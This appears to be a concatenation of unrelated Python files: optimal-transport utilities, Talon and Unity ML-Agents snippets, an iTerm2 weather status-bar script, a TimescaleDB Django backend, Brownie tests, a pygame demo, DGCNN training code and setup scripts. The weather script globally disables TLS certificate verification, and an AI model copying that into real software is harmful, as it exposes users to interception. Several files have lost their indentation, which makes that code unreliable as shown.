& (y.size()[1] == C.size()[2])
)
if not mask:
raise Exception(
"Dimension of cost C inconsistent with input "
"tensor dimension (x,y)"
)
def dist_matrix(x_i, y_j, p):
if p == 1:
return (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3)
elif p == 2:
return (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3) ** 2
else:
C_e = (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3)
return C_e ** (p)
def euclidean_cost(p):
def cost(x, y):
return dist_matrix(x, y, p)
return cost
def convolution(a, x, b, y, cost):
C = cost(x, y)
return (
torch.bmm(C, b[:, :, None]).squeeze(),
torch.bmm(C.transpose(1, 2), a[:, :, None]).squeeze(),
)
def softmin(a_i, C, b_j=None):
"""
Outputs the fixed point mapping (S_x, S_y) of Sinkhorn iterations, i.e.
mappings such that at convergence, f = S_y(g) and g = S_x(f).
"""
a_i_log = a_i.log()
def softmin_x(f_i, ep):
return -ep * (
(f_i / ep + a_i_log)[:, None, :] - C.transpose(1, 2) / ep
).logsumexp(dim=2)
if b_j is not None:
b_j_log = b_j.log()
def softmin_y(f_j, ep):
return -ep * ((f_j / ep + b_j_log)[:, None, :] - C / ep).logsumexp(
dim=2
)
return softmin_x, softmin_y
else:
return softmin_x, None
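# Minimal illustrative sketch (not part of the original module) of how the
# fixed-point maps returned by softmin() drive Sinkhorn iterations; eps and
# n_iter are hypothetical parameters chosen only for this example.
def _sinkhorn_sketch(a_i, x_i, b_j, y_j, p=2, eps=0.1, n_iter=100):
    C = euclidean_cost(p)(x_i, y_j)  # (n_batch, n_x, n_y) cost matrix
    softmin_x, softmin_y = softmin(a_i, C, b_j)
    f = torch.zeros_like(a_i)  # dual potential on the x side
    g = torch.zeros_like(b_j)  # dual potential on the y side
    for _ in range(n_iter):
        g = softmin_x(f, eps)  # g = S_x(f)
        f = softmin_y(g, eps)  # f = S_y(g)
    # entropic transport cost at (approximate) convergence
    return scal(a_i, f) + scal(b_j, g)
# e.g. a, x = generate_measure(1, 5, 2); b, y = generate_measure(1, 6, 2)
# cost = _sinkhorn_sketch(a, x, b, y)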
def exp_softmin(a_i, K, b_j=None):
"""
Outputs the fixed point mapping (S_x, S_y) of Sinkhorn iterations, i.e.
mappings such that at convergence, f = S_y(g) and g = S_x(f).
Exponential form which is not stabilized.
"""
def softmin_x(f_i):
return torch.einsum("ijk,ij->ik", K, f_i * a_i)
if b_j is not None:
def softmin_y(f_j):
return torch.einsum("ijk,ik->ij", K, f_j * b_j)
return softmin_x, softmin_y
else:
return softmin_x, None
def generate_measure(n_batch, n_sample, n_dim):
"""
Generate a batch of probability measures in R^d sampled over
the unit square
:param n_batch: Number of batches
:param n_sample: Number of sampling points in R^d
:param n_dim: Dimension of the feature space
:return: A (Nbatch, Nsample, Ndim) torch.Tensor
"""
m = torch.distributions.exponential.Exponential(1.0)
a = m.sample(torch.Size([n_batch, n_sample]))
a = a / a.sum(dim=1)[:, None]
m = torch.distributions.uniform.Uniform(0.0, 1.0)
x = m.sample(torch.Size([n_batch, n_sample, n_dim]))
return a, x
def generate_gaussian_measure(n_batch, n_sample, n_dim):
a = torch.ones(n_batch, n_sample)
a = a / a.sum(dim=1)[:, None]
m = torch.distributions.normal.Normal(0.0, 1.0)
x = m.sample(torch.Size([n_batch, n_sample, n_dim]))
return a, x
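# Editor's sketch (not part of the original module): one way the helpers above
# could be combined into a plain Sinkhorn loop. The epsilon value and the fixed
# iteration count are illustrative assumptions, not a prescription.
if __name__ == "__main__":
    torch.manual_seed(0)
    a, x = generate_measure(n_batch=2, n_sample=5, n_dim=3)
    b, y = generate_measure(n_batch=2, n_sample=6, n_dim=3)
    C = euclidean_cost(p=2)(x, y)  # cost matrix of shape (2, 5, 6)
    eps = 0.1
    smin_x, smin_y = softmin(a, C, b)
    f = torch.zeros_like(a)  # potential on the x side, shape (2, 5)
    g = torch.zeros_like(b)  # potential on the y side, shape (2, 6)
    for _ in range(100):
        g = smin_x(f, eps)  # g = S_x(f)
        f = smin_y(g, eps)  # f = S_y(g)
    # Dual objective <a, f> + <b, g> per batch element at (approximate) convergence.
    print(scal(a, f) + scal(b, g))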
|
69646
|
from typing import Any
from talon import Module
mod = Module()
mod.list(
"cursorless_to_raw_selection",
desc="Cursorless modifier that converts its input to a raw selection.",
)
@mod.capture(rule="{user.cursorless_to_raw_selection}")
def cursorless_to_raw_selection(m) -> dict[str, Any]:
return {"type": "toRawSelection"}
|
69681
|
from abc import ABC, abstractmethod
from typing import Dict
from mlagents.envs import AllBrainInfo, BrainParameters
class BaseUnityEnvironment(ABC):
@abstractmethod
def step(self, vector_action=None, memory=None, text_action=None, value=None) -> AllBrainInfo:
pass
@abstractmethod
def reset(self, config=None, train_mode=True) -> AllBrainInfo:
pass
@property
@abstractmethod
def global_done(self):
pass
@property
@abstractmethod
def external_brains(self) -> Dict[str, BrainParameters]:
pass
@property
@abstractmethod
def reset_parameters(self) -> Dict[str, str]:
pass
@abstractmethod
def close(self):
pass
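# Editor's sketch (not part of the original package): a minimal concrete subclass
# illustrating the contract above. The empty dicts are placeholders; a real
# environment would return populated AllBrainInfo objects.
class _StubUnityEnvironment(BaseUnityEnvironment):
    def __init__(self, brains: Dict[str, BrainParameters]):
        self._brains = brains
    def step(self, vector_action=None, memory=None, text_action=None, value=None) -> AllBrainInfo:
        return {}
    def reset(self, config=None, train_mode=True) -> AllBrainInfo:
        return {}
    @property
    def global_done(self):
        return False
    @property
    def external_brains(self) -> Dict[str, BrainParameters]:
        return self._brains
    @property
    def reset_parameters(self) -> Dict[str, str]:
        return {}
    def close(self):
        pass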
|
69800
|
import json
import traceback
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Union
from urllib import request as urlreq, parse as urlparse
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import iterm2
class WeatherInfo:
APIKEY = ''
CITYNAME = 'Shibuya'
UNITS = 'metric' # available units: metric, standard, imperial
ENDPOINT = 'https://api.openweathermap.org/data/2.5'
CURRENT_WEATHER_URL = '/weather'
FORECAST_URL = '/forecast'
ICON2CHAR = {
'01': '\uED98',
'02': '\uED94',
'03': '\uED8F',
'04': '\uED96',
'09': '\uED95',
'10': '\uED95',
'11': '\uED92',
'13': '\uED97',
'50': '\uED90',
}
NA = 'N/A'
def __init__(self, tz='JST', hours=9):
self.tz = timezone(timedelta(hours=hours), tz)
self.current_weather = None
self.forecast_weather = None
self.fetch_status = None
        self.lat = self.NA
        self.lon = self.NA
        self.dt = self.NA
        self.wc = self.NA
        self.wcd = self.NA
        self.wci = '02d'
        self.tc = self.NA
        self.tcs = self.NA
        self.w3 = self.NA
        self.w3d = self.NA
        self.w3i = '02d'
        self.t3 = self.NA
        self.t3s = self.NA
def build_url(self, mode='current') -> str:
params = self.build_params()
if mode == 'current':
url = f'{self.ENDPOINT}{self.CURRENT_WEATHER_URL}?{urlparse.urlencode(params)}'
elif mode == 'forecast':
url = f'{self.ENDPOINT}{self.FORECAST_URL}?{urlparse.urlencode(params)}'
else:
raise ValueError(f'Invalid mode={mode}: choose from `current` or `forecast`.')
return url
def build_params(self) -> dict:
return {
'q': self.CITYNAME,
'APPID': self.APIKEY,
'units': self.UNITS
}
def fetch_weather(self):
try:
with urlreq.urlopen(urlreq.Request(self.build_url('current'))) as res:
self.current_weather = json.load(res)
with urlreq.urlopen(urlreq.Request(self.build_url('forecast'))) as res:
self.forecast_weather = json.load(res)
self.fetch_status = 'SUCCEEDED'
        except Exception:
print(f'[ERROR] Fetch failed: {traceback.format_exc()}')
self.fetch_status = 'FAILED'
def parse_weather(self):
try:
self.lat = self.current_weather['coord']['lat']
self.lon = self.current_weather['coord']['lon']
self.dt = datetime.fromtimestamp(self.current_weather['dt'], self.tz)
self.wc = f"{self.current_weather['weather'][0]['main']}"
self.wcd = f"{self.current_weather['weather'][0]['description']}"
self.wci = self.current_weather['weather'][0]['icon']
self.tc = self.current_weather['main']['temp']
self.tcs = f'{self.tc:.1f}'
self.w3 = f"{self.forecast_weather['list'][0]['weather'][0]['main']}"
self.w3d = f"{self.forecast_weather['list'][0]['weather'][0]['description']}"
self.w3i = self.forecast_weather['list'][0]['weather'][0]['icon']
self.t3 = self.forecast_weather['list'][0]['main']['temp']
self.t3s = f'{self.t3:.1f}'
        except Exception:
            print(f'[ERROR] Something went wrong: {traceback.format_exc()}')
def get_char(self, icon: str) -> str:
icon = icon[:2]
if icon not in self.ICON2CHAR:
return self.NA
return self.ICON2CHAR[icon]
def print_weather_summary(self):
print(f'Fetch Status: {self.fetch_status}')
print(f'City: {self.CITYNAME} ({self.lat}, {self.lon})')
print()
print('=== weather info ===')
print(f'Datetime: {self.dt}')
print(f'Current Weather: {self.get_char(self.wci)} {self.wc} - {self.wcd}')
print(f'Current Temperature: \uED0E {self.tc}')
print(f'3hrs Weather: {self.get_char(self.w3i)} {self.w3} - {self.w3d}')
print(f'3hrs Temperature: \uED0E {self.t3}')
def iterm_format(self, use_icon=True, show_forecast=True) -> str:
sep = '\uEB5E' if use_icon else '▶'
th_char = '\uED0E ' if use_icon else ''
unit = ''
wc_char = f'{self.get_char(self.wci)} ' if use_icon else ''
w3_char = f'{self.get_char(self.w3i)} ' if use_icon else ''
weather_now = f'{wc_char}{self.wc} {th_char}{self.tcs}{unit}'
forecast = f' {sep} {w3_char}{self.w3} {th_char}{self.t3s}{unit}'
if show_forecast:
text = weather_now + forecast
else:
text = weather_now
return text
@dataclass
class KnobOption:
name: str
v: Union[str, bool]
async def main(connection):
knob_city = KnobOption('city', 'Shibuya')
knob_use_icon = KnobOption('use_icon', True)
knob_use_imperial = KnobOption('use_imperial', False)
knob_show_forecast = KnobOption('show_forecast', True)
knobs = [
iterm2.StringKnob('City', knob_city.v, knob_city.v, knob_city.name),
iterm2.CheckboxKnob('Use icon', knob_use_icon.v, knob_use_icon.name),
iterm2.CheckboxKnob('Show forecast', knob_show_forecast.v, knob_show_forecast.name),
iterm2.CheckboxKnob('Use imperial units', knob_use_imperial.v, knob_use_imperial.name),
]
component = iterm2.StatusBarComponent(
short_description='Weather Info',
detailed_description='A component that will tell you the current weather and the forecast.',
knobs=knobs,
exemplar=' Clouds 27.1 Clear 30.2',
update_cadence=60,
identifier='peinan.weather'
)
def have_log():
return LOGFILE_PATH.exists()
def is_refresh_time():
return datetime.now().minute % 10 == 0
def is_opt_modify(knobs):
opt_set = { k.name for k in [knob_city, knob_use_icon, knob_use_imperial, knob_show_forecast] }
if set(knobs.keys()) & opt_set == opt_set:
return True
return False
def read_log():
return json.load(LOGFILE_PATH.open())
def write_log(city: str, use_icon: bool, units: str, show_forecast: bool, weather_info: str):
log_data = {
'city': city,
'use_icon': use_icon,
'units': units,
'show_forecast': show_forecast,
'weather_info': weather_info
}
json.dump(log_data, LOGFILE_PATH.open('w'), ensure_ascii=False)
def knob_value(knobs, option: KnobOption, default_value):
"""returns the option's value if the option is in the knob, otherwise returns False"""
return knobs[option.name] if option.name in knobs else default_value
@iterm2.StatusBarRPC
async def weather_info(knobs):
w.CITYNAME = knob_value(knobs, knob_city, 'Shibuya')
w.UNITS = 'imperial' if knob_value(knobs, knob_use_imperial, False) else 'metric'
use_icon = bool(knob_value(knobs, knob_use_icon, True))
show_forecast = bool(knob_value(knobs, knob_show_forecast, True))
## for debug
# print(f'knobs: {knobs}')
# print(f'have log file: {have_log()}, is refresh time: {is_refresh_time()}')
if have_log():
log_data = read_log()
opt_req = is_opt_modify(knobs)
is_same_opt = w.CITYNAME == log_data['city'] and w.UNITS == log_data['units'] and \
use_icon == log_data['use_icon'] and show_forecast == log_data['show_forecast']
# print(f'is knob option request: {opt_req}, is same knob options: {is_same_opt}')
if not opt_req or (is_same_opt and not is_refresh_time()):
# print(f'[application info] Use stored weather info: '
# f'city={w.CITYNAME}, units={w.UNITS}, use_icon={use_icon}, show_forecast={show_forecast}')
return log_data['weather_info']
print(f'[application info] Fetching weather: {knobs}')
w.fetch_weather()
w.parse_weather()
weather_info = w.iterm_format(use_icon=use_icon, show_forecast=show_forecast)
write_log(w.CITYNAME, use_icon, w.UNITS, show_forecast, weather_info)
return weather_info
await component.async_register(connection, weather_info)
CONFIG = json.load((Path(__file__).parent / 'config.json').open())
APIKEY = CONFIG['OpenWeatherAPIKey']
LOGFILE_PATH = Path('/tmp/iterm-weatherinfo.log')
w = WeatherInfo()
w.APIKEY = APIKEY
iterm2.run_forever(main)
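# Editor's note (assumption inferred from the CONFIG lookup above): the
# config.json placed next to this script is expected to contain at least
#   {"OpenWeatherAPIKey": "<your OpenWeatherMap API key>"}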
|
69803
|
import logging
from django.db import ProgrammingError
from timescale.db.backends.postgis import base_impl
from timescale.db.backends.postgis.schema import TimescaleSchemaEditor
logger = logging.getLogger(__name__)
class DatabaseWrapper(base_impl.backend()):
SchemaEditorClass = TimescaleSchemaEditor
def prepare_database(self):
"""Prepare the configured database.
This is where we enable the `timescaledb` extension
if it isn't enabled yet."""
super().prepare_database()
with self.cursor() as cursor:
try:
cursor.execute('CREATE EXTENSION IF NOT EXISTS timescaledb')
except ProgrammingError: # permission denied
logger.warning(
'Failed to create "timescaledb" extension. '
                    'Usage of timescale capabilities might fail. '
'If timescale is needed, make sure you are connected '
'to the database as a superuser '
'or add the extension manually.',
exc_info=True
)
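# Editor's note: a hedged illustration of how a backend like this is typically
# selected from Django settings, assuming this module is installed as
# timescale/db/backends/postgis/base.py (the dotted path is inferred from the
# imports above, not confirmed by this file alone):
#
#   DATABASES = {
#       'default': {
#           'ENGINE': 'timescale.db.backends.postgis',
#           'NAME': 'mydb',
#           'USER': 'postgres',
#       }
#   }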
|
69826
|
from js_reimpl_common import run_op_chapter1_chapter2
def run_op(keys, op, **kwargs):
return run_op_chapter1_chapter2("chapter1", None, keys, op, **kwargs)
def create_new(numbers):
return run_op(None, "create_new", array=numbers)
def create_new_broken(numbers):
return run_op(None, "create_new_broken", array=numbers)
def has_key(keys, key):
return run_op(keys, "has_key", key=key)
def linear_search(numbers, key):
return run_op(None, "linear_search", key=key, array=numbers)
|
69837
|
import threading
import time
import pytest
import brownie
def send_and_wait_for_tx():
tx = brownie.accounts[0].transfer(
brownie.accounts[1], "0.1 ether", required_confs=0, silent=True
)
tx.wait(2)
assert tx.confirmations >= 2
assert tx.status == 1
@pytest.fixture
def block_time_network(devnetwork, config, network_name):
"""Provide a network with fixed block mining time of 1 second."""
config.networks[network_name]["cmd_settings"]["block_time"] = 1
devnetwork.disconnect()
devnetwork.connect(network_name)
yield devnetwork
devnetwork.disconnect()
def test_required_confirmations_deploy(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
accounts[0].deploy(BrownieTester, True, required_confs=3)
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transfer(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=3)
assert tx.confirmations >= 3
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transact(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
brownieTester = BrownieTester.deploy(True, {"from": accounts[0], "required_confs": 2})
assert web3.eth.block_number - block >= 2
block = web3.eth.block_number
tx = brownieTester.doNothing({"from": accounts[0], "required_confs": 4})
assert tx.confirmations >= 4
assert web3.eth.block_number - block >= 4
def test_required_confirmations_zero(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=0)
assert tx.status == -1
assert web3.eth.block_number - block == 0
time.sleep(1.5)
assert tx.status == 1
assert tx.confirmations >= 1
def test_wait_for_confirmations(accounts, block_time_network):
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=1)
tx.wait(3)
assert tx.confirmations in [3, 4]
tx.wait(2)
tx.wait(5)
assert tx.confirmations >= 5
def test_pending_nonce(accounts, block_time_network):
for _ in range(3):
accounts[0].transfer(accounts[1], "0.1 ether", required_confs=0, silent=True)
assert accounts[0]._pending_nonce() == 3
assert accounts[0].nonce < 3
time.sleep(3.5)
assert accounts[0].nonce == 3
def test_multithreading(accounts, history, block_time_network):
threads = []
for _ in range(3):
thread = threading.Thread(target=send_and_wait_for_tx, daemon=True)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
for tx in history:
assert tx.status == 1
assert tx.confirmations >= 2
|
69842
|
import pygame as pg
import sys
from collision import *
SCREENSIZE = (500,500)
pg.init()  # initialize pygame modules before creating the display
screen = pg.display.set_mode(SCREENSIZE, pg.DOUBLEBUF|pg.HWACCEL)
v = Vector
p0 = Concave_Poly(v(0,0), [v(-80,0), v(-20,20), v(0,80), v(20,20), v(80,0), v(20,-20), v(0,-80), v(-20,-20)])
p1 = Concave_Poly(v(500,500), [v(-80,0), v(-20,20), v(0,80), v(20,20), v(80,0), v(20,-20), v(0,-80), v(-20,-20)])
clock = pg.time.Clock()
while 1:
for event in pg.event.get():
if event.type == pg.QUIT:
sys.exit()
screen.fill((0,0,0))
p0.pos.x += 1
p0.pos.y += 0.75
p0.angle += 0.005
p1.pos.x -= 0.6
p1.pos.y -= 0.5
    p0c, p1c = (0,255,255), (0,255,255)
    p0bc = (255,255,255)
    p1bc = (255,255,255)
    if collide(p0,p1): p0c = p1c = (255,0,0)
    if test_aabb(p0.aabb,p1.aabb): p0bc = p1bc = (255,0,0)
pg.draw.polygon(screen, p0c, p0.points, 3)
pg.draw.polygon(screen, p1c, p1.points, 3)
pg.draw.polygon(screen, p0bc, (p0.aabb[0],p0.aabb[1],p0.aabb[3],p0.aabb[2]), 3)
pg.draw.polygon(screen, p1bc, (p1.aabb[0],p1.aabb[1],p1.aabb[3],p1.aabb[2]), 3)
pg.display.flip()
clock.tick(100)
|
69849
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os,time,datetime,sys
import numpy as np
import dgcnn
import tensorflow as tf
def round_decimals(val,digits):
factor = float(np.power(10,digits))
return int(val * factor+0.5) / factor
def iteration_from_filename(file_name):
return int((file_name.split('-'))[-1])
def iotest(flags):
# IO configuration
io = dgcnn.io_factory(flags)
io.initialize()
num_entries = io.num_entries()
ctr = 0
while ctr < num_entries:
idx,data,label,weight=io.next()
msg = str(ctr) + '/' + str(num_entries) + ' ... ' + str(idx) + ' ' + str(data[0].shape)
if label:
msg += str(label[0].shape)
if weight:
msg += str(weight[0].shape)
print(msg)
ctr += len(data)
io.finalize()
class Handlers:
sess = None
data_io = None
csv_logger = None
weight_io = None
train_logger = None
iteration = 0
def train(flags):
flags.TRAIN = True
handlers = prepare(flags)
train_loop(flags,handlers)
def inference(flags):
flags.TRAIN = False
handlers = prepare(flags)
inference_loop(flags,handlers)
def prepare(flags):
handlers = Handlers()
# assert
if flags.BATCH_SIZE % (flags.MINIBATCH_SIZE * len(flags.GPUS)):
    msg = '--batch_size (%d) must be a multiple of --minibatch_size (%d) * --gpus (%d)\n'
    msg = msg % (flags.BATCH_SIZE,flags.MINIBATCH_SIZE,len(flags.GPUS))
sys.stderr.write(msg)
sys.exit(1)
# IO configuration
handlers.data_io = dgcnn.io_factory(flags)
handlers.data_io.initialize()
_,train_data,_,_ = handlers.data_io.next()
# Trainer configuration
flags.NUM_CHANNEL = handlers.data_io.num_channels()
handlers.trainer = dgcnn.trainval(flags)
handlers.trainer.initialize()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
handlers.sess = tf.Session(config=config)
init = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
handlers.sess.run(init)
handlers.weight_io = tf.train.Saver(max_to_keep=flags.CHECKPOINT_NUM,
keep_checkpoint_every_n_hours=flags.CHECKPOINT_HOUR)
if flags.WEIGHT_PREFIX:
save_dir = flags.WEIGHT_PREFIX[0:flags.WEIGHT_PREFIX.rfind('/')]
if save_dir and not os.path.isdir(save_dir): os.makedirs(save_dir)
handlers.iteration = 0
loaded_iteration = 0
if flags.MODEL_PATH:
handlers.weight_io.restore(handlers.sess, flags.MODEL_PATH)
loaded_iteration = iteration_from_filename(flags.MODEL_PATH)
if flags.TRAIN: handlers.iteration = loaded_iteration+1
if flags.LOG_DIR:
if not os.path.exists(flags.LOG_DIR): os.mkdir(flags.LOG_DIR)
handlers.train_logger = tf.summary.FileWriter(flags.LOG_DIR)
handlers.train_logger.add_graph(handlers.sess.graph)
logname = '%s/train_log-%07d.csv' % (flags.LOG_DIR,loaded_iteration)
if not flags.TRAIN:
logname = '%s/inference_log-%07d.csv' % (flags.LOG_DIR,loaded_iteration)
handlers.csv_logger = open(logname,'w')
return handlers
def train_loop(flags,handlers):
handlers.csv_logger.write('iter,epoch')
handlers.csv_logger.write(',titer,ttrain,tio,tsave,tsummary')
handlers.csv_logger.write(',tsumiter,tsumtrain,tsumio,tsumsave,tsumsummary')
handlers.csv_logger.write(',loss,accuracy\n')
tsum = 0.
tsum_train = 0.
tsum_io = 0.
tsum_save = 0.
tsum_summary = 0.
while handlers.iteration < flags.ITERATION:
tstamp_iteration = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
tstart_iteration = time.time()
report_step = flags.REPORT_STEP and ((handlers.iteration+1) % flags.REPORT_STEP == 0)
summary_step = flags.SUMMARY_STEP and handlers.train_logger and ((handlers.iteration+1) % flags.SUMMARY_STEP == 0)
checkpt_step = flags.CHECKPOINT_STEP and flags.WEIGHT_PREFIX and ((handlers.iteration+1) % flags.CHECKPOINT_STEP == 0)
tstart = time.time()
idx,data,label,weight = handlers.data_io.next()
tspent_io = time.time() - tstart
tsum_io += tspent_io
current_idx = 0
loss_v = []
accuracy_v = []
handlers.trainer.zero_gradients(handlers.sess)
    # Accumulate gradients
tspent_train = 0.
tspent_summary = 0.
while current_idx < flags.BATCH_SIZE:
tstart = time.time()
data_v = []
label_v = []
weight_v = None
if weight is not None: weight_v = []
for _ in flags.GPUS:
start = current_idx
end = current_idx + flags.MINIBATCH_SIZE
data_v.append(data[start:end])
label_v.append(label[start:end])
if weight is not None:
weight_v.append(weight[start:end])
current_idx = end
# compute gradients
make_summary = summary_step and (current_idx == flags.BATCH_SIZE)
res = handlers.trainer.accum_gradient(handlers.sess,data_v,label_v,weight_v,summary=make_summary)
accuracy_v.append(res[1])
loss_v.append(res[2])
tspent_train = tspent_train + (time.time() - tstart)
# log summary
if make_summary:
tstart = time.time()
handlers.train_logger.add_summary(res[3],handlers.iteration)
tspent_summary = time.time() - tstart
# Apply gradients
tstart = time.time()
handlers.trainer.apply_gradient(handlers.sess)
tspent_train = tspent_train + (time.time() - tstart)
tsum_train += tspent_train
tsum_summary += tspent_summary
# Compute loss/accuracy
loss = np.mean(loss_v)
accuracy = np.mean(accuracy_v)
epoch = handlers.iteration * float(flags.BATCH_SIZE) / handlers.data_io.num_entries()
# Save snapshot
tspent_save = 0.
if checkpt_step:
tstart = time.time()
ssf_path = handlers.weight_io.save(handlers.sess,flags.WEIGHT_PREFIX,global_step=handlers.iteration)
tspent_save = time.time() - tstart
print('saved @',ssf_path)
# Report (logger)
if handlers.csv_logger:
tspent_iteration = time.time() - tstart_iteration
tsum += tspent_iteration
csv_data = '%d,%g,' % (handlers.iteration,epoch)
csv_data += '%g,%g,%g,%g,%g,' % (tspent_iteration,tspent_train,tspent_io,tspent_save,tspent_summary)
csv_data += '%g,%g,%g,%g,%g,' % (tsum,tsum_train,tsum_io,tsum_save,tsum_summary)
csv_data += '%g,%g\n' % (loss,accuracy)
handlers.csv_logger.write(csv_data)
# Report (stdout)
if report_step:
loss = round_decimals(loss,4)
accuracy = round_decimals(accuracy,4)
tfrac = round_decimals(tspent_train/tspent_iteration*100.,2)
epoch = round_decimals(epoch,2)
mem = handlers.sess.run(tf.contrib.memory_stats.MaxBytesInUse())
msg = 'Iteration %d (epoch %g) @ %s ... train time fraction %g%% max mem. %g ... loss %g accuracy %g'
msg = msg % (handlers.iteration,epoch,tstamp_iteration,tfrac,mem,loss,accuracy)
print(msg)
sys.stdout.flush()
if handlers.csv_logger: handlers.csv_logger.flush()
if handlers.train_logger: handlers.train_logger.flush()
# Increment iteration counter
handlers.iteration +=1
handlers.train_logger.close()
handlers.csv_logger.close()
handlers.data_io.finalize()
def inference_loop(flags,handlers):
handlers.csv_logger.write('iter,epoch')
handlers.csv_logger.write(',titer,tinference,tio')
handlers.csv_logger.write(',tsumiter,tsuminference,tsumio')
handlers.csv_logger.write(',loss,accuracy\n')
tsum = 0.
tsum_io = 0.
tsum_inference = 0.
while handlers.iteration < flags.ITERATION:
tstamp_iteration = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
tstart_iteration = time.time()
report_step = flags.REPORT_STEP and ((handlers.iteration+1) % flags.REPORT_STEP == 0)
tstart = time.time()
idx,data,label,weight = handlers.data_io.next()
tspent_io = time.time() - tstart
tsum_io += tspent_io
current_idx = 0
softmax_vv = []
loss_v = []
accuracy_v = []
# Run inference
    tspent_inference = 0.
    while current_idx < flags.BATCH_SIZE:
      tstart = time.time()
data_v = []
label_v = None
weight_v = None
if label is not None: label_v = []
if weight is not None: weight_v = []
for _ in flags.GPUS:
start = current_idx
end = current_idx + flags.MINIBATCH_SIZE
data_v.append(data[start:end])
if label is not None:
label_v.append(label[start:end])
if weight is not None:
weight_v.append(weight[start:end])
current_idx = end
      # run inference
res = handlers.trainer.inference(handlers.sess,data_v,label_v,weight_v)
if flags.LABEL_KEY:
softmax_vv = softmax_vv + res[0:-2]
accuracy_v.append(res[-2])
loss_v.append(res[-1])
else:
softmax_vv = softmax_vv + res
tspent_inference = tspent_inference + (time.time() - tstart)
tsum_inference += tspent_inference
# Store output if requested
if flags.OUTPUT_FILE:
idx_ctr = 0
for softmax_v in softmax_vv:
for softmax in softmax_v:
handlers.data_io.store(idx[idx_ctr],softmax)
idx_ctr += 1
# Compute loss/accuracy
    loss,accuracy = -1,-1
if flags.LABEL_KEY:
loss = np.mean(loss_v)
accuracy = np.mean(accuracy_v)
epoch = handlers.iteration * float(flags.BATCH_SIZE) / handlers.data_io.num_entries()
# Report (logger)
if handlers.csv_logger:
tspent_iteration = time.time() - tstart_iteration
tsum += tspent_iteration
csv_data = '%d,%g,' % (handlers.iteration,epoch)
csv_data += '%g,%g,%g,' % (tspent_iteration,tspent_inference,tspent_io)
csv_data += '%g,%g,%g,' % (tsum,tsum_inference,tsum_io)
csv_data += '%g,%g\n' % (loss,accuracy)
handlers.csv_logger.write(csv_data)
# Report (stdout)
if report_step:
loss = round_decimals(loss,4)
accuracy = round_decimals(accuracy,4)
tfrac = round_decimals(tspent_inference/tspent_iteration*100.,2)
epoch = round_decimals(epoch,2)
mem = handlers.sess.run(tf.contrib.memory_stats.MaxBytesInUse())
msg = 'Iteration %d (epoch %g) @ %s ... inference time fraction %g%% max mem. %g ... loss %g accuracy %g'
msg = msg % (handlers.iteration,epoch,tstamp_iteration,tfrac,mem,loss,accuracy)
print(msg)
sys.stdout.flush()
if handlers.csv_logger: handlers.csv_logger.flush()
# Increment iteration counter
handlers.iteration +=1
handlers.csv_logger.close()
handlers.data_io.finalize()
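# Editor's note: `flags` attributes referenced in this file (collected from the
# code above; their definitions and defaults live elsewhere in the project):
#   TRAIN, GPUS, BATCH_SIZE, MINIBATCH_SIZE, NUM_CHANNEL, ITERATION,
#   REPORT_STEP, SUMMARY_STEP, CHECKPOINT_STEP, CHECKPOINT_NUM, CHECKPOINT_HOUR,
#   WEIGHT_PREFIX, MODEL_PATH, LOG_DIR, LABEL_KEY, OUTPUT_FILE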
|
69852
|
from __future__ import with_statement
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import six
six_classifiers = [
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries',
'Topic :: Utilities',
]
with open('README', 'r') as fp:
six_long_description = fp.read()
setup(name='six',
version=six.__version__,
author='<NAME>',
author_email='<EMAIL>',
url='http://pypi.python.org/pypi/six/',
py_modules=['six'],
description='Python 2 and 3 compatibility utilities',
long_description=six_long_description,
license='MIT',
classifiers=six_classifiers
)
|
69855
|
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
NAME = "energyusage"
VERSION = "0.0.13"
DESCRIPTION = "Measuring the environmental impact of computation"
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = "https://github.com/responsibleproblemsolving/energy-usage"
AUTHOR = "<NAME>, <NAME>, <NAME>"
AUTHOR_EMAIL = "<EMAIL>"
LICENSE = "Apache 2.0"
CLASSIFIERS = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
]
PACKAGES = ['energyusage']
PACKAGE_DATA = {
'energyusage.data.csv' : ['*.csv'],
'energyusage.data.json' : ['*.json']
}
INCLUDE_PACKAGE_DATA = True
PACKAGE_DIR = {
'energyusage.data' : 'data'
}
INSTALL_REQUIRES = [
'requests',
'reportlab'
]
setup(
    name=NAME,
    version=VERSION,
    description=DESCRIPTION,
    long_description=LONG_DESCRIPTION,
    long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
    url=URL,
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    license=LICENSE,
    classifiers=CLASSIFIERS,
    packages=PACKAGES,
    package_data=PACKAGE_DATA,
    include_package_data=INCLUDE_PACKAGE_DATA,
    package_dir=PACKAGE_DIR,
    install_requires=INSTALL_REQUIRES
)
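# Editor's note: standard setuptools workflow for a script like this (generic
# commands, not specific to this project):
#   pip install .     # install from a source checkout
#   python -m build   # build sdist/wheel (requires the third-party `build` package)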
|